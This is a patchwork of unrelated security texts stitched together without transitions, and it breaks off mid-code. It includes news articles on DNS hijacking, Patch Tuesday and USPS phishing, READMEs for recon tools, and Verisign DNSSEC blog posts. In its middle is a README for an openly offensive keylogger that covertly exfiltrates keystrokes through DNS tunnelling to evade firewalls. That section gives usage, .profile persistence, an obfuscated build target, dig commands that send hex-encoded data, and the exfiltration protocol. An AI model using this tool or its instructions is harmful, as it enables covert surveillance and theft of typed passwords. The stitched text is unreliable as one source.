“The DigitalOcean DNS service is not authoritative, and we are not a domain registrar,” Digital Ocean wrote in an emailed response. “Where a domain owner has delegated authority to our DNS infrastructure with their registrar, and they have allowed their ownership of that DNS record in our infrastructure to lapse, that becomes a ‘lame delegation’ under this hijack model. We believe the root cause, ultimately, is poor management of domain name configuration by the owner, akin to leaving your keys in your unlocked car, but we acknowledge the opportunity to adjust our non-authoritative DNS service guardrails in an effort to help minimize the impact of a lapse in hygiene at the authoritative DNS level. We’re connected with the research teams to explore additional mitigation options.”
In a statement provided to KrebsOnSecurity, the hosting provider and registrar Hostinger said they were working to implement a solution to prevent lame duck attacks in the “upcoming weeks.”
“We are working on implementing an SOA-based domain verification system,” Hostinger wrote. “Custom nameservers with a Start of Authority (SOA) record will be used to verify whether the domain truly belongs to the customer. We aim to launch this user-friendly solution by the end of August. The final step is to deprecate preview domains, a functionality sometimes used by customers with malicious intents. Preview domains will be deprecated by the end of September. Legitimate users will be able to use randomly generated temporary subdomains instead.”
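Hostinger did not publish implementation details, but one plausible shape for an SOA-based ownership check is to assign each account a unique primary name server name and confirm the domain’s SOA record points at it before activating the zone. The sketch below is purely illustrative of that idea, not Hostinger’s system; the per-account name server hostname is hypothetical.

```python
# Illustrative only: verify that the SOA MNAME of a claimed domain matches the
# account-specific name server the provider assigned to this customer.
import dns.resolver

def soa_matches_account(domain, expected_mname):
    soa = dns.resolver.resolve(domain, "SOA")[0]
    return soa.mname.to_text().rstrip(".").lower() == expected_mname.rstrip(".").lower()

# "ns-acct12345.provider-dns.example" is a hypothetical per-account name server.
print(soa_matches_account("example.com", "ns-acct12345.provider-dns.example"))
```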
What did DNS providers that have struggled with this issue in the past do to address these authentication challenges? The security firms said that to claim a domain name, the best practice providers gave the account holder random name servers that required a change at the registrar before the domains could go live. They also found the best practice providers used various mechanisms to ensure that the newly assigned name server hosts did not match previous name server assignments.
[Side note: Infoblox observed that many of the hijacked domains were being hosted at Stark Industries Solutions, a sprawling hosting provider that appeared two weeks before Russia invaded Ukraine and has become the epicenter of countless cyberattacks against enemies of Russia].
Both Infoblox and Eclypsium said that without more cooperation and less finger-pointing by all stakeholders in the global DNS, attacks on sitting duck domains will continue to rise, with domain registrants and regular Internet users caught in the middle.
“Government organizations, regulators, and standards bodies should consider long-term solutions to vulnerabilities in the DNS management attack surface,” the Infoblox report concludes.
Howdy! My name is Harrison Richardson, or `rs0n` (arson) when I want to feel cooler than I really am. The code in this repository started as a small collection of scripts to help automate many of the common Bug Bounty hunting processes I found myself repeating. Over time, I built a simple web application with a MongoDB connection to manage my findings and identify valuable data points. After 5 years of Bug Bounty hunting, both part-time and full-time, I'm finally ready to package this collection of tools into a proper framework.
The Ars0n Framework is designed to provide aspiring Application Security Engineers with all the tools they need to leverage Bug Bounty hunting as a means to learn valuable, real-world AppSec concepts and make 💰 doing it! My goal is to lower the barrier of entry for Bug Bounty hunting by providing easy-to-use automation tools in combination with educational content and how-to guides for a wide range of Web-based and Cloud-based vulnerabilities. In combination with my YouTube content, this framework will help aspiring Application Security Engineers to quickly and easily understand real-world security concepts that directly translate to a high paying career in Cyber Security.
In addition to using this tool for Bug Bounty Hunting, aspiring engineers can also use this GitHub repository as a canvas to practice collaborating with other developers! This tool was inspired by Metasploit and designed to be modular in a similar way. Each Script (Ex: `wildfire.py` or `slowburn.py`) is basically an algorithm that runs the Modules (Ex: `fire-starter.py` or `fire-scanner.py`) in a specific pattern for a desired result. Because of this design, the community is free to build new Scripts to solve a specific use-case or Modules to expand the results of these Scripts. By learning the code in this framework and using GitHub to contribute your own code, aspiring engineers will continue to learn real-world skills that can be applied on the first day of a Security Engineer I position.
My hope is that this modular framework will act as a canvas to help share what I've learned over my career to the next generation of Security Engineers! Trust me, we need all the help we can get!!
Paste this code block into a clean installation of Kali Linux 2023.4 to download, install, and run the latest stable Alpha version of the framework:
sudo apt update && sudo apt-get update
sudo apt -y upgrade && sudo apt-get -y upgrade
wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
rm ars0n-framework-v0.0.2-alpha.tar.gz
cd ars0n-framework
./install.sh
wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
rm ars0n-framework-v0.0.2-alpha.tar.gz
The Ars0n Framework includes a script that installs all the necessary tools, packages, etc. that are needed to run the framework on a clean installation of Kali Linux 2023.4.
Please note that the only supported installation of this framework is on a clean installation of Kali Linux 2023.4. If you choose to try and run the framework outside of a clean Kali install, I will not be able to help troubleshoot if you have any issues.
./install.sh
This video shows exactly what to expect from a successful installation.
If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts
./install.sh --arm
You will be prompted to enter various API keys and tokens when the installation begins. Entering these is not required to run the core functionality of the framework. If you do not enter these API keys and tokens at the time of installation, simply hit enter at each of the prompts. The keys can be added later to the `~/.keys` directory. More information about how to add these keys manually can be found in the Frequently Asked Questions section of this README.
Once the installation is complete, you will be given the option to run the application by entering `Y`. If you choose not to run the application immediately, or if you need to run the application after a reboot, simply navigate to the root directory and run the `run.sh` bash script.
./run.sh
If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts
./run.sh --arm
The Ars0n Framework's Core Modules are used to determine the basic scanning logic. Each script is designed to support a specific recon methodology based on what the user is trying to accomplish.
At this time, the Wildfire script is the most widely used Core Module in the Ars0n Framework. The purpose of this module is to allow the user to scan multiple targets that allow for testing on any subdomain discovered by the researcher.
How it works:
Most Wildfire scans take between 8 and 48 hours to complete against a single domain if all Sub-Modules are being run. Variations in this timing can be caused by a number of factors, including the target application and the machine running the framework.
Also, please note that most data will not show in the GUI until the scan has completed. It's best to run the scan overnight or over a weekend, depending on the number of domains being scanned, and return once the scan has completed to move from Recon to Enumeration.
Running Wildfire:
Wildfire can be run from the GUI using the Wildfire button on the dashboard. Once clicked, the front-end will use the checkboxes on the screen to determine what flags should be passed to the scanner.
Please note that running scans from the GUI still has a few bugs and edge cases that haven't been sorted out. If you have any issues, you can simply run the scan from the CLI.
All Core Modules for The Ars0n Framework are stored in the `/toolkit` directory. Simply navigate to the directory and run `wildfire.py` with the necessary flags. At least one Sub-Module flag must be provided.
python3 wildfire.py --start --cloud --scan
Unlike the Wildfire module, which requires the user to identify target domains to scan, the Slowburn module does that work for you. By communicating with APIs for various bug bounty hunting platforms, this script will identify all domains that allow for testing on any discovered subdomain. Once the data has been populated, Slowburn will randomly choose one domain at a time to scan in the same way Wildfire does.
Please note that the Slowburn module is still in development and is not considered part of the stable alpha release. There will likely be bugs and edge cases encountered by the user.
In order for Slowburn to identify targets to scan, it must first be initialized. This initialization step collects the necessary data from various APIs and deposits it into a JSON file stored locally. Once this initialization step is complete, Slowburn will automatically begin selecting and scanning one target at a time.
To initialize Slowburn, simply run the following command:
python3 slowburn.py --initialize
Once the data has been collected, it is up to the user whether they want to re-initialize the tool upon the next scan.
Remember that the scope and targets on public bug bounty programs can change frequently. If you choose to run Slowburn without initializing the data, you may be scanning domains that are no longer in scope for the program. It is strongly recommended that Slowburn be re-initialized each time before running.
If you choose not to re-initialize the target data, you can run Slowburn using the previously collected data with the following command:
python3 slowburn.py
The Ars0n Framework's Sub-Modules are designed to be leveraged by the Core Modules to divide the Recon & Enumeration phases into specific tasks. The data collected in each Sub-Module is used by the others to expand your picture of the target's attack surface.
Fire-Starter is the first step to performing recon against a target domain. The goal of this script is to collect a wealth of information about the attack surface of your target. Once collected, this data will be used by all other Sub-Modules to help the user identify a specific URL that is potentially vulnerable.
Fire-Starter works by running a series of open-source tools to enumerate hidden subdomains, DNS records, and ASNs, in order to identify where those external assets are hosted. Currently, Fire-Starter chains together the following widely used open-source tools:
These tools cover a wide range of techniques to identify hidden subdomains, including web scraping, brute force, and crawling to identify links and JavaScript URLs.
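The snippet below is not the framework's actual code; it is a stripped-down illustration of the chaining pattern, assuming two commonly used enumeration tools (subfinder and amass) are installed and on the PATH.

```python
# Run each external tool, collect its stdout, and merge the results into one
# de-duplicated set of subdomains for later modules to consume.
import subprocess

def run(cmd):
    out = subprocess.run(cmd, capture_output=True, text=True)
    return set(line.strip() for line in out.stdout.splitlines() if line.strip())

def enumerate_subdomains(domain):
    found = set()
    found |= run(["subfinder", "-silent", "-d", domain])       # passive sources
    found |= run(["amass", "enum", "-passive", "-d", domain])   # more passive sources
    return sorted(found)

for sub in enumerate_subdomains("example.com"):
    print(sub)
```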
Once the scan is complete, the Dashboard will be updated and available to the user.
Most Sub-Modules in The Ars0n Framework require the data collected from the Fire-Starter module to work. With this in mind, Fire-Starter must be included in the first scan against a target for any usable data to be collected.
Coming soon...
Fire-Scanner uses the results of Fire-Starter and Fire-Cloud to perform Wide-Band Scanning against all subdomains and cloud services that have been discovered from previous scans.
At this stage of development, this script leverages Nuclei almost exclusively for all scanning. Instead of simply running the tool, Fire-Scanner breaks the scan down into specific collections of Nuclei Templates and scans them one by one. This strategy helps ensure the scans are stable and produce consistent results, removes any unnecessary or unsafe scan checks, and produces actionable results.
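Conceptually, the per-collection approach looks something like the sketch below; the template paths and file names are assumptions for illustration, not the module's real configuration.

```python
# Run Nuclei one template collection at a time so one noisy or unstable
# collection doesn't distort the whole scan.
import subprocess

COLLECTIONS = ["http/cves", "http/exposures", "http/misconfiguration"]  # assumed paths

for templates in COLLECTIONS:
    subprocess.run([
        "nuclei",
        "-l", "subdomains.txt",                                  # targets from recon
        "-t", templates,                                         # one collection per pass
        "-o", f"results_{templates.replace('/', '_')}.txt",
    ], check=False)
```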
The vast majority of issues installing and/or running the Ars0n Framework are caused by not installing the tool on a clean installation of Kali Linux.
It is important to remember that, at its core, the Ars0n Framework is a collection of automation scripts designed to run existing open-source tools. Each of these tools has its own way of operating and can experience unexpected behavior if conflicts emerge with any existing service/tool running on the user's system. This complexity is the reason why The Ars0n Framework should only be run on a clean installation of Kali Linux.
Another very common issue users experience is caused by MongoDB not successfully installing and/or running on their machine. The most common manifestation of this issue is that the user is unable to add an initial FQDN and simply sees a broken GUI. If this occurs, please ensure that your machine has the necessary system requirements to run MongoDB. Unfortunately, there is no current solution if you run into this issue.
Coming soon...
If only Patch Tuesdays came around infrequently — like total solar eclipse rare — instead of just creeping up on us each month like The Man in the Moon. Although to be fair, it would be tough for Microsoft to eclipse the number of vulnerabilities fixed in this month’s patch batch — a record 147 flaws in Windows and related software.
Yes, you read that right. Microsoft today released updates to address 147 security holes in Windows, Office, Azure, .NET Framework, Visual Studio, SQL Server, DNS Server, Windows Defender, Bitlocker, and Windows Secure Boot.
“This is the largest release from Microsoft this year and the largest since at least 2017,” said Dustin Childs, from Trend Micro’s Zero Day Initiative (ZDI). “As far as I can tell, it’s the largest Patch Tuesday release from Microsoft of all time.”
Tempering the sheer volume of this month’s patches is the middling severity of many of the bugs. Only three of April’s vulnerabilities earned Microsoft’s most-dire “critical” rating, meaning they can be abused by malware or malcontents to take remote control over unpatched systems with no help from users.
Most of the flaws that Microsoft deems “more likely to be exploited” this month are marked as “important,” which usually involve bugs that require a bit more user interaction (social engineering) but which nevertheless can result in system security bypass, compromise, and the theft of critical assets.
Ben McCarthy, lead cyber security engineer at Immersive Labs called attention to CVE-2024-20670, an Outlook for Windows spoofing vulnerability described as being easy to exploit. It involves convincing a user to click on a malicious link in an email, which can then steal the user’s password hash and authenticate as the user in another Microsoft service.
Another interesting bug McCarthy pointed to is CVE-2024-29063, which involves hard-coded credentials in Azure’s search backend infrastructure that could be gleaned by taking advantage of Azure AI search.
“This along with many other AI attacks in recent news shows a potential new attack surface that we are just learning how to mitigate against,” McCarthy said. “Microsoft has updated their backend and notified any customers who have been affected by the credential leakage.”
CVE-2024-29988 is a weakness that allows attackers to bypass Windows SmartScreen, a technology Microsoft designed to provide additional protections for end users against phishing and malware attacks. Childs said one of ZDI’s researchers found this vulnerability being exploited in the wild, although Microsoft doesn’t currently list CVE-2024-29988 as being exploited.
“I would treat this as in the wild until Microsoft clarifies,” Childs said. “The bug itself acts much like CVE-2024-21412 – a [zero-day threat from February] that bypassed the Mark of the Web feature and allows malware to execute on a target system. Threat actors are sending exploits in a zipped file to evade EDR/NDR detection and then using this bug (and others) to bypass Mark of the Web.”
Update, 7:46 p.m. ET: A previous version of this story said there were no zero-day vulnerabilities fixed this month. BleepingComputer reports that Microsoft has since confirmed that there are actually two zero-days. One is the flaw Childs just mentioned (CVE-2024-21412), and the other is CVE-2024-26234, described as a “proxy driver spoofing” weakness.
Satnam Narang at Tenable notes that this month’s release includes fixes for two dozen flaws in Windows Secure Boot, the majority of which are considered “Exploitation Less Likely” according to Microsoft.
“However, the last time Microsoft patched a flaw in Windows Secure Boot in May 2023 had a notable impact as it was exploited in the wild and linked to the BlackLotus UEFI bootkit, which was sold on dark web forums for $5,000,” Narang said. “BlackLotus can bypass functionality called secure boot, which is designed to block malware from being able to load when booting up. While none of these Secure Boot vulnerabilities addressed this month were exploited in the wild, they serve as a reminder that flaws in Secure Boot persist, and we could see more malicious activity related to Secure Boot in the future.”
For links to individual security advisories indexed by severity, check out ZDI’s blog and the Patch Tuesday post from the SANS Internet Storm Center. Please consider backing up your data or your drive before updating, and drop a note in the comments here if you experience any issues applying these fixes.
Adobe today released nine patches tackling at least two dozen vulnerabilities in a range of software products, including Adobe After Effects, Photoshop, Commerce, InDesign, Experience Manager, Media Encoder, Bridge, Illustrator, and Adobe Animate.
KrebsOnSecurity needs to correct the record on a point mentioned at the end of March’s “Fat Patch Tuesday” post, which looked at new AI capabilities built into Adobe Acrobat that are turned on by default. Adobe has since clarified that its apps won’t use AI to auto-scan your documents, as the original language in its FAQ suggested.
“In practice, no document scanning or analysis occurs unless a user actively engages with the AI features by agreeing to the terms, opening a document, and selecting the AI Assistant or generative summary buttons for that specific document,” Adobe said earlier this month.
This post-exploitation keylogger will covertly exfiltrate keystrokes to a server.
The tool is designed for lightweight exfiltration and persistence, and it uses DNS tunneling/exfiltration to bypass firewalls and evade detection.
The server uses python3.
To install dependencies, run python3 -m pip install -r requirements.txt
To start the server, run python3 main.py
usage: dns exfiltration server [-h] [-p PORT] ip domain
positional arguments:
ip
domain
options:
-h, --help show this help message and exit
-p PORT, --port PORT port to listen on
By default, the server listens on UDP port 53. Use the -p flag to specify a different port.
ip is the IP address of the server. It is used in SOA and NS records, which allow other nameservers to find the server.
domain is the domain to listen for, which should be the domain that the server is authoritative for.
At your registrar, change your domain's nameservers to custom DNS and point them to two hostnames, ns1.example.com and ns2.example.com. Then add records that point those nameserver hostnames to your exfiltration server's IP address. This is the same as setting glue records.
The Linux keylogger is two bash scripts. connection.sh is used by the logger.sh script to send the keystrokes to the server. If you want to manually send data, such as a file, you can pipe data to the connection.sh script. It will automatically establish a connection and send the data.
logger.sh
# Usage: logger.sh [-options] domain
# Positional Arguments:
# domain: the domain to send data to
# Options:
# -p path: give path to log file to listen to
# -l: run the logger with warnings and errors printed
To start the keylogger, run the command ./logger.sh [domain] && exit. This will silently start the keylogger, and any inputs typed will be sent. The && exit at the end causes the shell to close on exit; without it, exiting will bring you back to the non-keylogged shell. Remove the &> /dev/null redirection to display error messages.
The -p option specifies the location of the temporary log file where all the inputs are written. By default, this is /tmp/.
The -l option will show warnings and errors, which can be useful for debugging.
logger.sh and connection.sh must be in the same directory for the keylogger to work. If you want persistence, you can add the command to .profile to start it on every new interactive shell.
connection.sh
Usage: command [-options] domain
Positional Arguments:
domain: the domain to send data to
Options:
-n: number of characters to store before sending a packet
To build the keylogging program, run make in the windows directory. To build with reduced size and some amount of obfuscation, make the production target. This will create the build directory for you and output a file named logger.exe in the build directory.
make production domain=example.com
You can also choose to build the program with debugging by making the debug target.
make debug domain=example.com
For both targets, you will need to specify the domain the server is listening for.
You can use dig to send requests to the server:
dig @127.0.0.1 a.1.1.1.example.com A +short
sends a connection request to a server on localhost.
dig @127.0.0.1 b.1.1.54686520717569636B2062726F776E20666F782E1B.example.com A +short
sends a test message to localhost.
Replace example.com with the domain the server is listening for.
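For reference, the payload in the second dig example above is just ASCII text encoded as hexadecimal. A minimal Python sketch (standard library only) showing the decoding and encoding:

# Decode the hex payload from the test message above back to ASCII.
payload = "54686520717569636B2062726F776E20666F782E1B"
print(bytes.fromhex(payload).decode("ascii"))  # "The quick brown fox." followed by an ESC control character (0x1B)

# Encode an arbitrary string the same way before placing it in a query label.
print("hello".encode("ascii").hex().upper())   # 68656C6C6F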
A record requests starting with a indicate the start of a "connection." When the server receives one, it responds with a fake non-reserved IP address whose last octet contains the id of the client.
The following is the format for starting a connection: a.1.1.1.[sld].[tld].
The server will respond with an IP address in the following format: 123.123.123.[id]
Concurrent connections cannot exceed 254, and clients are never considered "disconnected."
A record requests starting with b indicate exfiltrated data being sent to the server.
The following is the format for sending data after establishing a connection: b.[packet #].[id].[data].[sld].[tld].
The server will respond with [code].123.123.123
id is the id that was established on connection. Data is sent as ASCII encoded in hex.
code is one of the codes described below.
200: OK. If the client sends a request that is processed normally, the server will respond with code 200.
201: Malformed Record Request. If the client sends a malformed record request, the server will respond with code 201.
202: Non-Existent Connection. If the client sends a data packet with an id greater than the number of connections, the server will respond with code 202.
203: Out of Order Packet. If the client sends a packet with a packet id that doesn't match what is expected, the server will respond with code 203. Clients and servers should reset their packet numbers to 0, and the client can then resend the packet with the new packet id.
204: Reached Max Connections. If the client attempts to create a connection when the maximum has been reached, the server will respond with code 204.
Clients should rely on responses as acknowledgements of received packets. If they do not receive a response, they should resend the same payload.
The log file containing user inputs contains ASCII control characters, such as backspace, delete, and carriage return. If you print the contents using something like cat, you should select the appropriate option to print ASCII control characters, such as -v for cat, or open it in a text editor.
The keylogger relies on script, so it won't run in non-interactive shells.
For some reason, the Windows Dns_Query_A function always sends duplicate requests. The server handles this fine because it discards repeated packets.
The quantum computing era is coming, and it will change everything about how the world connects online. While quantum computing will yield tremendous benefits, it will also create new risks, so it’s essential that we prepare our critical internet infrastructure for what’s to come. That’s why we’re so pleased to share our latest efforts in this area, including technology that we’re making available as an open source implementation to help internet operators worldwide prepare.
In recent years, the research team here at Verisign has been focused on a future where quantum computing is a reality, and where the general best practices and guidelines of traditional cryptography are re-imagined. As part of that work, we’ve made three further contributions to help the DNS community prepare for these changes:
First, a brief refresher on what MTL mode is and what it accomplishes:
MTL mode is a technique developed by Verisign researchers that can reduce the operational impact of a signature scheme when authenticating an evolving series of messages. Rather than signing messages individually, MTL mode signs structures called Merkle tree ladders that are derived from the messages to be authenticated. Individual messages are authenticated relative to a ladder using a Merkle tree authentication path, while ladders are authenticated relative to a public key of an underlying signature scheme using a digital signature. The size and computational cost of the underlying digital signatures can therefore be spread across multiple messages.
The reduction in operational impact achieved by MTL mode can be particularly beneficial when the mode is applied to a signature scheme that has a large signature size or computational cost in specific use cases, such as when post-quantum signature schemes are applied to DNSSEC.
Recently, Verisign Fellow Duane Wessels described how Verisign’s DNSSEC algorithm update — from RSA/SHA-256 (Algorithm 8) to ECDSA Curve P-256 with SHA-256 (Algorithm 13) — increases the security strength of DNSSEC signatures and reduces their size impact. The present update is a logical next step in the evolution of DNSSEC resiliency. In the future, it is possible that DNSSEC may utilize a post-quantum signature scheme. Among the new post-quantum signature schemes currently being standardized, though, there is a shortcoming; if we were to directly apply these schemes to DNSSEC, it would significantly increase the size of the signatures1. With our work on MTL mode, the researchers at Verisign have provided a way to achieve the security benefit of a post-quantum algorithm rollover in a way that mitigates the size impact.
Put simply, this means that in a quantum environment, the MTL mode of operation developed by Verisign will enable internet infrastructure operators to use the longer signatures they will need to protect communications from quantum attacks, while still supporting the speed and space efficiency we’ve come to expect.
For more background information on MTL mode and how it works, see my July 2023 blog post, the MTL mode I-D, or the research paper, “Merkle Tree Ladder Mode: Reducing the Size Impact of NIST PQC Signature Algorithms in Practice.”
In my July 2023 blog post titled “Next Steps in Preparing for Post-Quantum DNSSEC,” I described two recent contributions by Verisign to help the DNS community prepare for a post-quantum world: the MTL mode I-D and a public, royalty-free license to certain intellectual property related to that I-D. These activities set the stage for the latest contributions I’m announcing in this post today.
Verisign is grateful for the DNS community’s interest in this area, and we are pleased to serve as stewards of the internet when it comes to developing new technology that can help the internet grow and thrive. Our work on MTL mode is one of the longer-term efforts supporting our mission to enhance the security, stability, and resiliency of the global DNS. We’re encouraged by the progress that has been achieved, and we look forward to further collaborations as we prepare for a post-quantum future.
The post Verisign Provides Open Source Implementation of Merkle Tree Ladder Mode appeared first on Verisign Blog.
The fake USPS phishing page.
Recent weeks have seen a sizable uptick in the number of phishing scams targeting U.S. Postal Service (USPS) customers. Here’s a look at an extensive SMS phishing operation that tries to steal personal and financial data by spoofing the USPS, as well as postal services in at least a dozen other countries.
KrebsOnSecurity recently heard from a reader who received an SMS purporting to have been sent by the USPS, saying there was a problem with a package destined for the reader’s address. Clicking the link in the text message brings one to the domain usps.informedtrck[.]com.
The landing page generated by the phishing link includes the USPS logo, and says “Your package is on hold for an invalid recipient address. Fill in the correct address info by the link.” Below that message is a “Click update” button that takes the visitor to a page that asks for more information.
The remaining buttons on the phishing page all link to the real USPS.com website. After collecting your address information, the fake USPS site goes on to request additional personal and financial data.
This phishing domain was recently registered and its WHOIS ownership records are basically nonexistent. However, we can find some compelling clues about the extent of this operation by loading the phishing page in Developer Tools, a set of debugging features built into Firefox, Chrome and Safari that allow one to closely inspect a webpage’s code and operations.
Check out the bottom portion of the screenshot below, and you’ll notice that this phishing site fails to load some external resources, including an image from a link called fly.linkcdn[.]to.
A search on this domain at the always-useful URLscan.io shows that fly.linkcdn[.]to is tied to a slew of USPS-themed phishing domains. Here are just a few of those domains (links defanged to prevent accidental clicking):
usps.receivepost[.]com
usps.informedtrck[.]com
usps.trckspost[.]com
postreceive[.]com
usps.trckpackages[.]com
usps.infortrck[.]com
usps.quicktpos[.]com
usps.postreceive[.]com
usps.revepost[.]com
trackingusps.infortrck[.]com
usps.receivepost[.]com
usps.trckmybusi[.]com
postreceive[.]com
tackingpos[.]com
usps.trckstamp[.]com
usa-usps[.]shop
usps.infortrck[.]com
unlistedstampreceive[.]com
usps.stampreceive[.]com
usps.stamppos[.]com
usps.stampspos[.]com
usps.trckmypost[.]com
usps.trckintern[.]com
usps.tackingpos[.]com
usps.posinformed[.]com
As we can see in the screenshot below, the developer tools console for informedtrck[.]com complains that the site is unable to load a Google Analytics code — UA-80133954-3 — which apparently was rejected for pointing to an invalid domain.
Notice the highlighted Google Analytics code exposed by a faulty Javascript element on the phishing website. That code actually belongs to the USPS.
The valid domain for that Google Analytics code is the official usps.com website. According to dnslytics.com, that same analytics code has shown up on at least six other nearly identical USPS phishing pages dating back nearly as many years, including onlineuspsexpress[.]com, which DomainTools.com says was registered way back in September 2018 to an individual in Nigeria.
A different domain with that same Google Analytics code that was registered in 2021 is peraltansepeda[.]com, which archive.org shows was running a similar set of phishing pages targeting USPS users. DomainTools.com indicates this website name was registered by phishers based in Indonesia.
DomainTools says the above-mentioned USPS phishing domain stamppos[.]com was registered in 2022 via Singapore-based Alibaba.com, but the registrant city and state listed for that domain says “Georgia, AL,” which is not a real location.
Alas, running a search for domains registered through Alibaba to anyone claiming to reside in Georgia, AL reveals nearly 300 recent postal phishing domains ending in “.top.” These domains are either administrative domains obscured by a password-protected login page, or are .top domains phishing customers of the USPS as well as postal services serving other countries.
Those other nations include the Australia Post, An Post (Ireland), Correos.es (Spain), the Costa Rican post, the Chilean Post, the Mexican Postal Service, Poste Italiane (Italy), PostNL (Netherlands), PostNord (Denmark, Norway and Sweden), and Posti (Finland). A complete list of these domains is available here (PDF).
A phishing page targeting An Post, the state-owned provider of postal services in Ireland.
The Georgia, AL domains at Alibaba also encompass several that spoof sites claiming to collect outstanding road toll fees and fines on behalf of the governments of Australia, New Zealand and Singapore.
An anonymous reader wrote in to say they submitted fake information to the above-mentioned phishing site usps.receivepost[.]com via the malware sandbox any.run. A video recording of that analysis shows that the site sends any submitted data via an automated bot on the Telegram instant messaging service.
The traffic analysis just below the any.run video shows that any data collected by the phishing site is being sent to the Telegram user @chenlun, who offers to sell customized source code for phishing pages. From a review of @chenlun’s other Telegram channels, it appears this account is being massively spammed at the moment — possibly thanks to public attention brought by this story.
Meanwhile, researchers at DomainTools recently published a report on an apparently unrelated but equally sprawling SMS-based phishing campaign targeting USPS customers that appears to be the work of cybercriminals based in Iran.
Phishers tend to cast a wide net and often spoof entities that are broadly used by the local population, and few brands are going to have more household reach than domestic mail services. In June, the United Parcel Service (UPS) disclosed that fraudsters were abusing an online shipment tracking tool in Canada to send highly targeted SMS phishing messages that spoofed the UPS and other brands.
With the holiday shopping season nearly upon us, now is a great time to remind family and friends about the best advice to sidestep phishing scams: Avoid clicking on links or attachments that arrive unbidden in emails, text messages and other mediums. Most phishing scams invoke a temporal element that warns of negative consequences should you fail to respond or act quickly.
If you’re unsure whether the message is legitimate, take a deep breath and visit the site or service in question manually — ideally, using a browser bookmark so as to avoid potential typosquatting sites.
Update: Added information about the Telegram bot and any.run analysis.
DNSWatch is a Python-based tool that allows you to sniff and analyze DNS (Domain Name System) traffic on your network. It listens to DNS requests and responses and provides insights into the DNS activity.
git clone https://github.com/HalilDeniz/DNSWatch.git
pip install -r requirements.txt
python dnswatch.py -i <interface> [-v] [-o <output_file>] [-k <target_ip>] [--analyze-dns-types] [--doh]
-i, --interface: Specify the network interface (e.g., eth0).
-v, --verbose: Use this flag for more verbose output.
-o, --output: Specify the filename to save results.
-t, --target-ip: Specify a specific target IP address to monitor.
-adt, --analyze-dns-types: Analyze DNS types.
--doh: Use DNS over HTTPS (DoH) for resolving DNS requests.
-fd, --target-domains: Filter DNS requests by specified domains.
-d, --database: Enable database storage for DNS requests.
Press Ctrl+C to stop the sniffing process.
python dnswatch.py -i eth0
python dnswatch.py -i eth0 -o dns_results.txt
python dnswatch.py -i eth0 -k 192.168.1.100
python dnswatch.py -i eth0 --analyze-dns-types
python dnswatch.py -i eth0 --doh
python3 dnswatch.py -i wlan0 --database
DNSWatch is licensed under the MIT License. See the LICENSE file for details.
This tool is intended for educational and testing purposes only. It should not be used for any malicious activities.
Raw HTML extractor from the Hurricane Electric portal.
go install -v github.com/HuntDownProject/hednsextractor/cmd/hednsextractor@latest
For usage information, run hednsextractor -h.
Getting the IP Addresses used for hackerone.com, and enumerating only the networks.
nslookup hackerone.com | awk '/Address: / {print $2}' | hednsextractor -silent -only-networks
[INF] [104.16.99.52] 104.16.0.0/12
[INF] [104.16.99.52] 104.16.96.0/20
Getting the IP Addresses used for hackerone.com, and enumerating only the domains (using tail to show the last 10 results).
nslookup hackerone.com | awk '/Address: / {print $2}' | hednsextractor -silent -only-domains | tail -n 10
herllus.com
hezzy.store
hilariostore.com
hiperdrop.com
hippratas.online
hitsstory.com
hobbyshop.site
holyangelstore.com
holzfallerstore.fun
homedescontoo.com
Edit the config file and add the Virustotal API Key
cat $HOME/.config/hednsextractor/config.yaml
# hednsextractor config file
# generated by https://github.com/projectdiscovery/goflags
# show only domains
#only-domains: false
# show only networks
#only-networks: false
# show virustotal score
#vt: false
# minimum virustotal score to show
#vt-score: 0
# ip address or network to query
#target:
# show silent output
#silent: false
# show verbose output
#verbose: false
# virustotal api key
vt-api-key: Your API Key goes here
Then run hednsextractor with the -vt parameter:
nslookup hackerone.com | awk '/Address: / {print $2}' | hednsextractor -only-domains -vt
The output will look like the following:
_______ ______ _ _______ _______ _________ _______ _______ _______ _________ _______ _______
|\ /|( ____ \( __ \ ( ( /|( ____ \( ____ \|\ /|\__ __/( ____ )( ___ )( ____ \\__ __/( ___ )( ____ )
| ) ( || ( \/| ( \ )| \ ( || ( \/| ( \/( \ / ) ) ( | ( )|| ( ) || ( \/ ) ( | ( ) || ( )|
| (___) || (__ | | ) || \ | || (_____ | (__ \ (_) / | | | (____)|| (___) || | | | | | | || (____)|
| ___ || __) | | | || (\ \) |(_____ )| __) ) _ ( | | | __)| ___ || | | | | | | || __)
| ( ) || ( | | ) || | \ | ) || ( / ( ) \ | | | (\ ( | ( ) || | | | | | | || (\ (
| ) ( || (____/\| (__/ )| ) \ |/\____) || (____/\( / \ ) | | | ) \ \__| ) ( || (____/\ | | | (___) || ) \ \__
|/ \|(_______/(______/ |/ )_)\_______)(_______/|/ \| )_( |/ \__/|/ \|(_______/ )_( (_______)|/ \__/
[INF] Current hednsextractor version v1.0.0
[INF] [104.16.0.0/12] domain: ohst.ltd VT Score: 0
[INF] [104.16.0.0/12] domain: jxcraft.net VT Score: 0
[INF] [104.16.0.0/12] domain: teatimegm.com VT Score: 2
[INF] [104.16.0.0/12] domain: debugcheat.com VT Score: 0
As part of Verisign’s ongoing effort to make global internet infrastructure more secure, stable, and resilient, we will soon make an important technology update to how we protect the top-level domains (TLDs) we operate. The vast majority of internet users won’t notice any difference, but the update will support enhanced security for several Verisign-operated TLDs and pave the way for broader adoption and the next era of Domain Name System (DNS) security measures.
Beginning in the next few months and continuing through the end of 2023, we will upgrade the algorithm we use to sign domain names in the .com, .net, and .edu zones with Domain Name System Security Extensions (DNSSEC).
In this blog, we’ll outline the details of the upcoming change and what members of the DNS technical community need to know.
DNSSEC provides data authentication security to DNS responses. It does this by ensuring any altered data can be detected and blocked, thereby preserving the integrity of DNS data. Think of it as a chain of trust – one that helps avoid misdirection and allows users to trust that they have gotten to their intended online destination safely and securely.
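As a quick way to see this chain of trust in action, the sketch below (Python with the dnspython library; the domain name and the public resolver address are illustrative assumptions) sends a query with DNSSEC material requested and checks whether a validating resolver set the AD (authenticated data) flag on the response:

import dns.flags
import dns.message
import dns.query  # dnspython

# Ask a validating resolver for an A record with DNSSEC material requested.
query = dns.message.make_query("verisign.com.", "A", want_dnssec=True)
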